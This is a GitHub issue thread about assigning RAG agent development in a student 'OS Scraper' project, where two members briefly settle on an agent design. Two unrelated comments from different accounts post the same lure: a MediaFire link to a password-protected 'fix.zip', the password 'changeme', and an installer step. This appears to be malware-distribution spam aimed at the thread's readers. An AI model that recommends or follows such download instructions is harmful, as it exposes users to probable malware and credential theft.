### ISSUE TITLE
Assign development of each RAG Agent in OS Scraper to a member

### ISSUE THREAD

**Issue by vaishakhsnair** [The-Capstone-Project/OS-Scraper#8]

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by psychoSherlock** [comment]
@vaishakhsnair   should we ask everyone to add more to the json? or should we ask em to create more induvidual agents?

**Comment by psychoSherlock** [comment]
Ok fixed, we are gonna follow same agents concepts. @vaishakhsnair  json will be  used for general os scraping

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
